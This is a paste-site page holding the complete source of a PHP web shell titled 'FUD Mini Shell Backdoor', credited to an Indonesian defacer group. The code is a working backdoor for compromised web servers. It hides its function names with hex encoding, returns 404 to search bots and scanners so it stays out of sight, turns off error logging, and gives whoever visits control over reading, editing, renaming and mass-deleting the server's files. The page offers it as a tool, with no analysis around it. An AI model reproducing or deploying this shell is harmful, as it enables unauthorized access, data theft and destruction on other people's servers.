Ad Block 1
avatar
[PHP] FUD Mini Shell Backdoor

Guest 32 20th Apr, 2019

                                           
                         <?php
/**
*
* [ FUD - MINI SHELL BACKDOOR ].
*
* @author BLACKHATCODE < BIMACYBERTEAM@GMAIL.COM >
* @copyright (C) 2019 INDONESIAN DEFACER.
* THANKS TO : B374K, ZER0BYTE, SHUTDOWN57, SHOR7CUT
*
**/
@session_start();
@ob_start();
set_time_limit(0);
error_reporting(0);
header("X-XSS-Protection: 0");
$config = array();
$config['version'] 	= "1.0"; // VERSION.SUBVERSION
$config['title'] 	= "5hell Controller ".$config['version']; // TITLE
// CLEAN MAGIC QUOTES
$_POST      = clean($_POST);
$_GET       = clean($_GET);
$_REQUEST   = clean($_REQUEST);
/**
* /-----------------------------------/
* / SOME DEFINE PATH, ACTION, ETC.    /
* /-----------------------------------/
*/
define('ROOT',getcwd());
define('DS',DIRECTORY_SEPARATOR);
define('CURR_PATH',(empty($_GET['u'])) ? ROOT : $_GET['u']);
// ****
$__style	= "rVZbj6JIGH3fZP8Dm84mO+ulAe+YeUBttHVau7Uvo5t9KKCEUqBoKC9I/O9b3BSU7plNpki6saj6Luc736mSser5JnA0ZJUItgWGY+19O54w4JIEM6kpB2n6aU4Gylpz8MZSSwo2sCMwN2yP7bLd9vH33/72l9gipSUwkeEJL/LGIhvmAVu46EIHLdtHOXB9NiEke8NtLjpAgatQJ5Hlm2U4oo87GEZRZdn2UXd8GTsqdATO3jMuNpDK3PDhaB+BH++udpsVUWoTuCclFSrYAQRhS7CwBekqQcdb6PhZT0fbgb4NVBVZmsAyTRrKcYkd01eRaxvAE5BloGA7AbIBGaIXbV/ZOC41ocIl2BikfbwxAbIyOXLhaJdMfChFcZccoKKNK4TA50ztkEp0+sr+2U6i4WmmYTw3OgR0vR/mBQykWUJQs7hYAnvawZ7WMkT1P/usc/65AHwQAIVbXiNSIg6w3AABwcEEEPhXiauUKw0Val+ifD5b8LlLBhTLcG9T+KGBXBLVgwGXFbkxobXJgzOxzgTIVENkHOjSEvj/A+hrGsWsCcpc0iPOcfUM708RxJGCcJzjiXiT5FxN6lYOMkfWEsfcjTrt2nNsp56yEWQY2A0DiQwR2XAZ4vhxiHwAAMWPIAUYMStMpKoG5WpZAx7FOsX22FO6rxpBX4VrfknpDUgITdG1gRInQK0HlTRRppZ8K3jaP9GxORYvRCOn7NWrqldPspbiZVCjeirEWBvSgVbqwUNXIMvekEOxbDvYtEmxTPYEOBDkMTQmF5uEIGNCsJkueaUVPJ+rX4oE1H3k1r8uXRJHSjpiblQabLg1ilzeEP/CXyb0VvBcFORDsT1xPuy/pJ39HPkKIGbPS2if5+vyaQGVrA9hi72nezSvAejZ1r4Q87N5/QrDDC8jD8nu+qmJT/udHJJwzeD5A5k2dgiw6GFQdqFJT0EPnU6QMM08ZSwH2sCEB0sawCx9659pVmw1gjqx3IxrH9jWizTt64BzhCBa/+MSxCt1Pn0cKdCirZpmde2SZUrwXPZ0/apbUzPXIeRknVFejj2nfjpWlHAEUofgbolysf4w25TER4RPjPwMVDm4p7mb1vqscYXiSBE93Us47sRG05Px/pecdx+jWM16C2r9cUnCcaEe12Rnkm60MEHLDCPjPbEFNhw5pLhkbOyjkqF+HDnDn32diRCbPpaXGJPsdSq876bpGyCXc/7Eli604vKYLka40bc01Y6hGv9DPBt+VXSorOmSf8uK65aSX0yBMYAMjXAyfEsYEN0cwntackMJGix7Ry3JBlbW2XtMtg1LDrQhIFSR4rf0Nxu7KJRlWqwPLhbxxdfGKGz3H2ckhC9Qzcks33MpjDhq4WKsNFzy4hR/6DArusd8f8gEGhQ2jvGXCggQwp+3tqVRNFxYrxbRa2cy3bGjvoZFOsazF/3uRQtem8Ef2BXn9F/v8P1uygYT/e9T6W0wfZb5Bavykrd46nQW/RZazDpD+U2yFq9DY/42rSmKYTwGG2bqcHonvcCx467Z/mi3Euf6Yjx8n2/Rk90bfZso84o7ke6lWk+S2JG2gnNxhw5mbzOe7AeK5PSNFWzZIjeSx5N3V99aOj/v1ZrbutmoqfvBvdpF4prVSE1SCrzWk58mzd74ebbmelyHjGZojd/2rxL70nhWhzXDnN03O2TZFacjF0vejrMx/KZ0VjuDBXfae3cnmqBq1Ty9WxAVODu8q716ayr2CocVVGcd+D64rXaXSGxUZQ30C7gy2D+9TKecO9FW1rv90NsWWLReDNf2wXt8bK13hnwPnrSxO6nV+pOCLvO6Xdla99zA4L8vnht7WHgcjuW3+ZumeAA3vhVsnterwIO2rnqPw1ejsi2sJGWjj02tQERw2G/HLSI262azMqgXJLNmVUxbrbbcmdED83FlNZSbbxI4PHi8sySblXzr3SHYmWriYtC/ncA+XNYfxLA0L6+T6ajWnd/ff/3SPv4H";
$__getcwd    	= "\x67"."\x65\x74\x63\x77\x64";
$__fget_con 	= "\x66\x69\x6c\x65"."\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
$__sc_dir     	= "s"."\x63\x61\x6e\x64\x69"."r";
$__rm_dir     	= "\x72\x6d\x64"."ir";
$__un_link    	= "\x75\x6e"."\x6c\x69\x6e\x6b";
// BLOCK SEARCH ENGINE BOT
if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|acunetix|facebook|node|crawler|googlebot|facebookexternalhit|google|bing|yahoo|yahooseeker|yahoo!|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|PycURL|Mediapartners|facebok|rambler|msnbot|yandex|libwww/i', $_SERVER['HTTP_USER_AGENT']))){
	header("HTTP/1.0 404 Not Found");
	header("Status: 404 Not Found");
	die();
}
elseif(!isset($_SERVER['HTTP_USER_AGENT'])){
	header("HTTP/1.0 404 Not Found");
	header("Status: 404 Not Found");
	die();
}
// MAGIC QUOTE BYPASS
function clean($arr){
	$quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
	if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
		if(is_array($arr)){
			foreach($arr as $k=>$v){
				if(is_array($v)) $arr[$k] = clean($v);
				else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
				}
			}
		}
		return $arr;
	}
	// DISABLE DEBUGING
	if($__server_debug){
		error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
		@ini_set('display_errors','1');
		@ini_set('log_errors','1');
		foreach($_GP as $k=>$v){
			if(is_array($v)) $v = print_r($v, true);
			echo "<span>".hss($k."=>".$v)."</span><br />";
		}
	}else{
		error_reporting(0);
		@ini_set('display_errors','0');
		@ini_set('log_errors','0');
	}
	// CLEAN LOGS
	$__server_error    = @ob_get_contents();
	$__server_result   = isset($__server_result) ? $__server_result:"";
	if(!empty($__server_error)) $__server_result = notif($__server_error).$__server_result;
	@ob_end_clean();
	@ob_start();

	// GET FILE PERMISSIONS
	function perms($__server_file){
		$perms = fileperms($__server_file);
		if(($perms & 0xC000) == 0xC000){$info = 's';
	}elseif (($perms & 0xA000) == 0xA000){$info = 'l';
	}elseif (($perms & 0x8000) == 0x8000){$info = '-';
	}elseif (($perms & 0x6000) == 0x6000){$info = 'b';
	}elseif (($perms & 0x4000) == 0x4000){$info = 'd';
	}elseif (($perms & 0x2000) == 0x2000){$info = 'c';
	}elseif (($perms & 0x1000) == 0x1000){$info = 'p';
	}else {$info = 'u';
}
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
	return $info;
}
function mass_delete($filelok){
	if(is_dir($filelok)){
		if(!rmdir($filelok)){
			$s=scandir($filelok);
			foreach ($s as $ss) {
				if(is_file($filelok."/".$ss)){
					if(unlink($filelok."/".$ss)){
						$rm=rmdir($filelok);
					}
				}
				if(is_dir($filelok."/".$ss)){
					$rm=rmdir($filelok."/".$ss);
					$rm.=rmdir($filelok);
				}
			}
		}elseif(is_file($filelok)){
			$rm = unlink($filelok);
		}
	}elseif(is_file($filelok)){
		$rm = unlink($filelok);
	}
	return $rm;
}
function redirect($kemana, $apa = 'html'){
	if($apa == 'html'){
		echo "<meta http-equiv='refresh' content='0;url={$kemana}'>";
	}elseif($apa == 'js'){
		echo "<script>window.location.href='{$kemana}';</script>";
	}elseif($apa == 'php'){
		@ob_start();
		header('location:'.$kemana);
		flush();
	}
}
// SERVER INFORMATION
$__server_software 	= getenv("SERVER_SOFTWARE");
$__server_system 	= php_uname();
$__server_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
$__server_my_ip = $_SERVER['REMOTE_ADDR'];
$__server_info  = "<table><tr><td>↺&nbsp;".$__server_system."</td></tr>";
$__server_info .= "<tr><td>↺&nbsp;".$__server_software."</td></tr>";
$__server_info .= "<tr><td>↺&nbsp;Server IP : ".$__server_server_ip."<span class='gaya'> | </span>Your IP : ".$__server_my_ip;
$__server_info .= "<span class='gaya'> | </span> Time @ Server : ".@date("d M Y H:i:s",time());
$__server_info .= "</table>";

echo "<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'>
<meta name='robots' content='noindex, nofollow, noarchive'>
<link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
<script type='text/javascript' src='https://code.jquery.com/jquery-3.4.0.min.js'></script>
<script type='text/javascript' src='https://cdn.jsdelivr.net/npm/vanilla-lazyload@8.17.0/dist/lazyload.min.js'></script>
<script type='text/javascript' src='https://cdn.jsdelivr.net/npm/vanilla-lazyload@10.19.0/dist/lazyload.min.js'></script>
<script type='text/javascript'> url.split('?')[0] </script>
<script type='text/javascript'>
function select_all(pilih){
	var cek = document.getElementsByName('fl[]');
	for (var i =0; n=cek.length;i++) {
		cek[i].checked = pilih.checked;
	}
}
function hs(a,x){
	document.getElementById(a).style.display='block';
	document.getElementById(x).style.display='none';
}
</script>
<title>".$config['title']." - ".$_SERVER['HTTP_HOST']." </title>
<link rel='shortcut icon' href='http://nzsc.xtgem.com/favicon.png' />
<style type='text/css'>".$__css = gzinflate(base64_decode($__style));echo $__css."</style>
</head>
<body>";
echo $__server_info;
if (isset($_GET['path'])){
	$path = $_GET['path']; chdir($_GET['path']);
}else{
	$path = $__getcwd();
}
$path  = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo '<table width="100%" border="0" align="center""><tr><td>';
echo "↺&nbsp;Location : ";
foreach ($paths as $id => $location){
	echo "<a href='?path=";
	for ($i = 0; $i <= $id; $i++){
		echo $paths[$i];
		if ($i != $id){
			echo "/";
		}
	}
	echo "'>$location / </a>";
}
echo '&nbsp;- [ <a href="?">Home</a> ]</font></td>';
echo '<tr><td></table><br />';
if(isset($_POST['sac'])){
	if($_POST['action'] == 'delete'){
		foreach($_POST['fl'] as $dfil){
			@mass_delete($dfil);
		}
	}
	@redirect('?path='.CURR_PATH.'');
}elseif(isset($_GET['filesrc'])){
	echo '<table width="100%" border="0" cellpadding="1" cellspacing="1" align="center">
	<tr><td>
	Filename : '.basename($_GET['filesrc']).'
	</tr></td></table><br />';
	echo "<center><div id='result'><textarea class='inputzbut' style='margin: 0px; height: 357px; width: 100%;'' readonly=''>" . htmlspecialchars($__fget_con($_GET['filesrc'])) . "</textarea></div></center>";
}elseif($_POST['opt'] == 'rename'){
	if(isset($_POST['newname'])){
		if(rename($_POST['path'], $path.'/'.$_POST['newname'])){
			$result = '<font color="#00ff00">Rename File OK !</font>';
		}else{
			$result = '<font color="red">Rename File Failed !</font>';
		}
		$_POST['name'] = $_POST['newname'];
	}
	echo '<form method="POST">
	<div id="result">
	New Filename : <input name="newname" class="inputz" style="width:40%;height:19px;" type="text" value="'.$_POST['name'].'" />
	<input class="inputzbut" style="width:100px;height:23px;" type="submit" value="Save Change" />
	<label>'.$result.'</label>
	<input type="hidden" name="path" value="'.$_POST['path'].'">
	<input type="hidden" name="opt" value="rename">
	</div></form>';
}elseif($_POST['opt'] == 'edit'){
	if(isset($_POST['src'])){
		$fp = fopen($_POST['path'], 'w');
		if(fwrite($fp, $_POST['src'])){
			$result = '<font color="#00ff00">Edit File OK !</font>';
		}else{
			$result = '<font color="red">Edit File Failed !</font>';
		}
		fclose($fp);
	}
	echo '<form method="POST">
	<div id="result">
	Filename : <input class="inputz" style="width:40%;height:19px;" type="text" name="path" value="'.$_POST['path'].'" />
	<input class="inputzbut" style="width:100px;height:23px;" type="submit" value="Save Change" />
	<label>'.$result.'</label>
	<input type="hidden" name="opt" value="edit"><br /><br />
	<textarea class="inputzbut" style="margin: 0px; height: 357px; width: 100%;" name="src" id="src">'.htmlspecialchars($__fget_con($_POST['path'])).'</textarea></form></div>';
}else{
	if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
		if ($_POST['type'] == 'dir') {
			if ($__rm_dir($_POST['path'])){
				$result = '<font color="#00ff00">Delete Folder OK !</font>';
			}else{
				$result = '<font color="red">Delete Folder Failed !</font>';
			}
		}elseif($_POST['type'] == 'file'){
			if ($__un_link($_POST['path'])){
				$result = '<font color="#00ff00">Delete File OK !</font>';
			}else{
				$result = '<font color="red">Delete File Failed !</font>';
			}
		}
	}
	$_scdir = $__sc_dir($path);
	echo '<div id="result">
	<form method="post">
	<table class="explore sortable" border="0" cellpadding="3" cellspacing="1" align="center">
	<thead>
	<tr class="first">
	<th width="1%"><input id="checkalll" type="checkbox" name="fl[]" onclick="select_all(this)" /></th>
	<th><center>Filename</center></th>
	<th width="10%"><center>Size</center></th>
	<th width="10%"><center>Permissions</center></th>
	<th width="15%"><center>Last Update</center></th>
	<th width="15%"><center>Options</center></th></tr>
	</thead>';
	foreach ($_scdir as $dir) {
		if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..')
			continue;
		echo "<tr>
		<td><center><input type='checkbox' name='fl[]' value='".CURR_PATH.DS."{$dir}' /></center></td>
		<td><img src='http://nzsc.xtgem.com/folder.png' width=15px>&nbsp;
		<a href=\"?path=$path/$dir\">[ $dir ]</a></td>
		<td><center>--</center></td>
		<td><center>";
		if (is_writable("$path/$dir"))
			echo '<font color="#00ff00">';
		elseif (!is_readable("$path/$dir"))
			echo '<font color="red">';
		echo perms("$path/$dir");
		if (is_writable("$path/$dir") || !is_readable("$path/$dir"))
			echo '</font>';
		echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";
		echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"><select class=\"inputzbut\" name=\"opt\"><option value=\"\"></option><option value=\"rename\">Rename</option><option value=\"delete\">Delete</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"><input type=\"submit\" class=\"inputzbut\" value=\"+\" /></form></center></td></tr>";
	}
	foreach ($_scdir as $file) {
		if (!is_file("$path/$file"))
			continue;
		$size = filesize("$path/$file") / 1024;
		$size = round($size, 3);
		if ($size >= 1024) {
			$size = round($size / 1024, 2) . ' MB';
		} else {
			$size = $size . ' KB';
		}
		echo "<tr>
		<td><center><input type='checkbox' name='fl[]' value='".CURR_PATH.DS."{$file}' /></center></td>
		<td><img src='http://nzsc.xtgem.com/file2.png' width=15px>&nbsp;
		<a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
		<td>".$size."</td>
		<td><center>";
		if (is_writable("$path/$file"))
			echo '<font color="#00ff00">';
		elseif (!is_readable("$path/$file"))
			echo '<font color="red">';
		echo perms("$path/$file");
		if (is_writable("$path/$file") || !is_readable("$path/$file"))
			echo '</font>';
		echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";
		echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select class=\"inputzbut\" name=\"opt\"><option value=\"\"></option><option value=\"edit\">Edit</option><option value=\"rename\">Rename</option><option value=\"delete\">Delete</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"><input type=\"submit\" class=\"inputzbut\" value=\"+\" /></form></center></td></tr>";
	}
	echo '<tr>
	<td style="text-align:center;border-top:3px ;text-indent:4px;">
	<input id="checkalll" class="css-checkbox" type="checkbox" name="fl[]" onclick="select_all(this)" />
	<label for="checkalll" class="css-label"></label>
	</td>
	<td style="border-top:3px ;">
	<select id="action" name="action" class="inputzbut" style="width:85%;height:18px;margin:0;">
	<option value="" disabled selected>--- [ Choose Action ] ---</option>
	<option value="delete">Delete</option>
	</select>
	<input type="submit" value="Execute" name="sac" class="inputzbut" />
	</td>
	</form>
	</td>
	</tr>
	</table></div>';
}
echo '<br><center>&copy; <a href="">2019</a> - Indonesian Defacer</center><br>';
echo '</body></html>';
?>
                      
                                       
To share this paste please copy this url and send to your friends
RAW Paste Data
Ad Block 2

Comments

Authentication required

You must log in to post a comment.

Log in
    There are no comments yet.